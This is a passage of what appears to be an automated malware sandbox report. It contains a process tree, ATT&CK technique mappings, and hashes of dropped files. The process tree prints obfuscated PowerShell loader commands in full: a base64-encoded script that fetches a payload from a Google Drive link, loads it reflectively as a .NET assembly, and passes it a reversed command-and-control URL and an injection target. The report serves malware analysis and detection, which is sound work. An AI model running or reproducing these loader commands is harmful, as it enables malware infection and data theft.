  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4oho4kpp\4oho4kpp.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4276
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBB5.tmp" "c:\Users\Admin\AppData\Local\Temp\4oho4kpp\CSC526FCFE7BBDE4AAB92D4AA80F9396388.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5064
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3232
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        
        PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwErshEll.ExE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
75acdbfa869008816e55d7e8d24602de

SHA1
0343dec947713996823b6116f9ba8d15cd05aea6

SHA256
e3cd559af01ea232be65c648c4aaf6317e675d8c3c04f0f74deef377087473bb

SHA512
5ede450dfed9000e7cc118bf3686709109f0893ee08893f9dd0a7430cdce6bd98194c2092943bf5dbe63c34b92aaf946a0a99cdcfb2f6e54993c003b07360af9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
9d1fda0133833aa11e1432f6cba0add4

SHA1
20aa3b9f10671def665ff743f628c7d4cde2f1e8

SHA256
d7c6432b09ff79947640c7944d1126e1e7c91b468c7dd9fa8a1f9ab1ae2bce66

SHA512
a17a3aa2a713e45dcd82e14efb4b43c1149c0ae74cca985e7fcb227c3c5d306819bee51b5a4128c52e1ceeb075af8eeaab07d7c409547965ebe69f4d9142e094

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
30313b528ea8119ed791d032b1385275

SHA1
fdab1fca76def5450dd46398b6daf70ad4ca7e13

SHA256
a2174ee76c778bf494c4d3666a4e49c5e71109edb11f32d0e409859a00eb2ef1

SHA512
a9bc71b0c9db70edf6a24637f3d9121fe5d9fb41ed090ec8777c2f73acb29ccaa22c3a8f756a702ce59a9f9ac5c57055ad394f1103cbfe60feb6ddf9eb9a894a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
d18c502433bb01d026f97f1a767ecd05

SHA1
78d97b079a6323e5c322ee71f08872a888be99d5

SHA256
0a0f71fe0f1008311609d79c70a5d307f8b7f06d42e3a774782f1ce30327e203

SHA512
03d8a7f6b4ebaf8b8ee9ffcf4fc264d76bcea75e8c72d0f3e965c14f2803060da506e08a83dc40ac732fa338f8e300e831896bb0a1d5d0fc59e5054f7bffe7cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9ed1316c1734ba985b07011248f2112e

SHA1
40f13decd135bc86db9ba292249ac64d2d05c1dd

SHA256
16e504d4d0c34ded049b2b0f04a21701cdab9e69707e4cd78aa6fa91bcf0df80

SHA512
066df349ffb37bb2dad9a96f10e88c86c3e9d5b8ee4de28a0838bcf22f8589cb581d7ba0af6b8e240ab9a6860b53ecf1dac9d392c7257595f98e0961ba04d6f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2iji34p1\2iji34p1.dll

Filesize
3KB

MD5
617725f5ac2e45f5c2ce4e47ed5dfdaf

SHA1
81365af93da3ca0ff3fdcae245f15528c0874bcb

SHA256
c7a8f52547fa910a21a64d47f70b9e6ae339636e75abc7c99404b0ce713ef285

SHA512
689a4691e0a8b9417c58ba1a8fcdebdc47c5e8ede9184dea2ced52e4d7ac020ffadcc4f3d3bfc3a8705163be1cbc25356d7e3acf6e011edbdbf80d11cafe8a97

Download Submit
C:\Users\Admin\AppData\Local\Temp\4oho4kpp\4oho4kpp.dll

Filesize
3KB

MD5
24afa4e19d997652ac555865c88b4e3a

SHA1
9bde5e945ecd26e5e21cc4444bf2d6c5166bf391

SHA256
f382f2df9875309ed36bd3ccc4ef1a30bef978efa7d9ac976412fd20b758656a

SHA512
1229845127c59684123afee8f260ac38c8ac6b46af58b4d2ac004212aec99f52f1c6b81ef52dadea1ec3d7069ca58dc35846b69107e444b191e92a52c8a7996a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp

Filesize
1KB

MD5
d26c647676d9d5f71fd39722dcac0ce7

SHA1
1f388be5dd65574de1f0821ac08fa8a6a99cdc6a

SHA256
7a3c8ca7eed1d1ea0bf72907df9e4859df3c2dcae6300db060789d3aaec9abe8

SHA512
dc84515d299388c3ab8da1b66d1e942b7eb46db69d1f6cf60bc86b2d16fafabf178c422aaced08de99f4a305b89e9be729df60d0ee97d8eb40b49b2031451520

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFBB5.tmp

Filesize
1KB

MD5
584bff20886363f18c773aec899506e2

SHA1
ce6914ddbc5424379a2c21b0ea376893170997f9

SHA256
133db837222835b8f5a8dff345fd8f496684675868f7110caa21f7315c8edde4

SHA512
af8fe841683d7dcf52285ebf0d977fbca3d2575f39f8a5ae935de091bd987965a0bbb1bd4155458dbd914fca6f40c3bcca194a70f2e5101bd5699335e0869bab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aylbctge.5hb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

Filesize
137KB

MD5
4dd3d6eed0e1ade77fde299848078ef8

SHA1
75855bee75c0c52d00cad1897c381ffc6c706200

SHA256
9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

SHA512
3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2iji34p1\2iji34p1.0.cs

Filesize
487B

MD5
9b8f2dee116254910197a8801c205862

SHA1
c4fddb1f937921b75c5c988cdb3f459faa446d52

SHA256
5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

SHA512
00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2iji34p1\2iji34p1.cmdline

Filesize
369B

MD5
5eb07d35d4ac88f040241b100d923ec3

SHA1
66819721492fe9c47cc6f2bf58212701933e9456

SHA256
b7ebc42742e5c5d33794bbc9b825a275876f3f10ed0030fa9f73b2830435f166

SHA512
b457eec36521e91b30223bda498bcace01f693a607bc134cb70cfbb8455085ee26f22a84a838c5e86b043550aa0114a0675afa82ff1d4f978d43f9225e7cd6cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2iji34p1\CSC2FED37F419914EBCB8F234D6FB83AB0.TMP

Filesize
652B

MD5
5e22e6e0855ceb0e457c2ad56f425729

SHA1
cf557bfd78bcf1df1cc72655bd3aa1ffb7537a23

SHA256
06d84aa133bd052519bfc3cc9756890e0bab9b65d8ff155d5e61dae28514d9cf

SHA512
e44a76c42ecc862af4b61f18488eef8cd3854b56dfd4ebc9e0aa1c8b351f88d4ac81f87def01e5db275bc04f730fc6858eee4934c49affaf383bbd1e1c86c551

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4oho4kpp\4oho4kpp.cmdline

Filesize
369B

MD5
904932ad90f8003f16609d4c3be259fc

SHA1
72b95ea465561cc8de8db63cec95c14d746cee46

SHA256
b5251ed326853c4ae7f5cbab5c73c6513a8a037c930db51bce31f139fd263791

SHA512
2f475a0d9bb98170aa84fff0a5af9526c303a99623496c4ee3536d8ba2b1bd5ae5ab11c405c8770a1fd587ee0ea028e55b0e82ec3b1a1ef8e67d2e6b9e79f5b7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4oho4kpp\CSC526FCFE7BBDE4AAB92D4AA80F9396388.TMP

Filesize
652B

MD5
c3b1ebd7d9b4c98c37faa642a1e93021

SHA1
7831b212682bf48b7a3b8d8c1c7b6bcc46c41d81

SHA256
c0d54d307a111c60ef95f1ae0693309b5890fd949fd3a939702e6065e0b10d0b

SHA512
63d9862456e3974a33d12dc1f81c4648c62c8edf617ebc3b8ffa79d651ad49489aa6fc063381cb0c0edf44cdd640a37a92011b48d0130a650648a3749f5d61fc

Download Submit
memory/1388-176-0x0000000008070000-0x000000000810C000-memory.dmp

Filesize
624KB

Download
memory/1388-175-0x0000000007F10000-0x000000000806A000-memory.dmp

Filesize
1.4MB

Download
memory/1808-120-0x000000006D4B0000-0x000000006D4FC000-memory.dmp

Filesize
304KB

Download
memory/1808-130-0x0000000007BD0000-0x0000000007C73000-memory.dmp

Filesize
652KB

Download
memory/1808-131-0x0000000007F10000-0x0000000007F21000-memory.dmp

Filesize
68KB

Download
memory/1808-132-0x0000000007F50000-0x0000000007F64000-memory.dmp

Filesize
80KB

Download
memory/2188-87-0x0000000005640000-0x0000000005994000-memory.dmp

Filesize
3.3MB

Download
memory/2216-65-0x0000000006A70000-0x0000000006A78000-memory.dmp

Filesize
32KB

Download
memory/2216-2-0x0000000070BF0000-0x00000000713A0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

Filesize
216KB

Download
memory/2216-0-0x0000000070BFE000-0x0000000070BFF000-memory.dmp

Filesize
4KB

Download
memory/2216-3-0x0000000005730000-0x0000000005D58000-memory.dmp

Filesize
6.2MB

Download
memory/2216-71-0x0000000070BFE000-0x0000000070BFF000-memory.dmp

Filesize
4KB

Download
memory/2216-72-0x0000000070BF0000-0x00000000713A0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-73-0x0000000007880000-0x00000000078A2000-memory.dmp

Filesize
136KB

Download
memory/2216-74-0x0000000008730000-0x0000000008CD4000-memory.dmp

Filesize
5.6MB

Download
memory/2216-18-0x00000000064B0000-0x00000000064CE000-memory.dmp

Filesize
120KB

Download
memory/2216-4-0x0000000070BF0000-0x00000000713A0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-5-0x0000000005570000-0x0000000005592000-memory.dmp

Filesize
136KB

Download
memory/2216-81-0x0000000070BF0000-0x00000000713A0000-memory.dmp

Filesize
7.7MB

Download
memory/2216-6-0x0000000005DD0000-0x0000000005E36000-memory.dmp

Filesize
408KB

Download
memory/2216-7-0x0000000005E40000-0x0000000005EA6000-memory.dmp

Filesize
408KB

Download
memory/2216-17-0x0000000005EB0000-0x0000000006204000-memory.dmp

Filesize
3.3MB

Download
memory/2216-19-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/2888-146-0x0000000006DA0000-0x0000000006DA8000-memory.dmp

Filesize
32KB

Download
memory/3408-47-0x0000000007170000-0x000000000717E000-memory.dmp

Filesize
56KB

Download
memory/3408-50-0x0000000007260000-0x0000000007268000-memory.dmp

Filesize
32KB

Download
memory/3408-30-0x000000006D4B0000-0x000000006D4FC000-memory.dmp

Filesize
304KB

Download
memory/3408-40-0x0000000006220000-0x000000000623E000-memory.dmp

Filesize
120KB

Download
memory/3408-41-0x0000000006E00000-0x0000000006EA3000-memory.dmp

Filesize
652KB

Download
memory/3408-42-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download
memory/3408-43-0x0000000006F40000-0x0000000006F5A000-memory.dmp

Filesize
104KB

Download
memory/3408-44-0x0000000006FB0000-0x0000000006FBA000-memory.dmp

Filesize
40KB

Download
memory/3408-49-0x0000000007280000-0x000000000729A000-memory.dmp

Filesize
104KB

Download
memory/3408-48-0x0000000007180000-0x0000000007194000-memory.dmp

Filesize
80KB

Download
memory/3408-45-0x00000000071C0000-0x0000000007256000-memory.dmp

Filesize
600KB

Download
memory/3408-46-0x0000000007140000-0x0000000007151000-memory.dmp

Filesize
68KB

Download
memory/3408-29-0x00000000061E0000-0x0000000006212000-memory.dmp

Filesize
200KB

Download
memory/3732-202-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3732-178-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3732-177-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3732-218-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download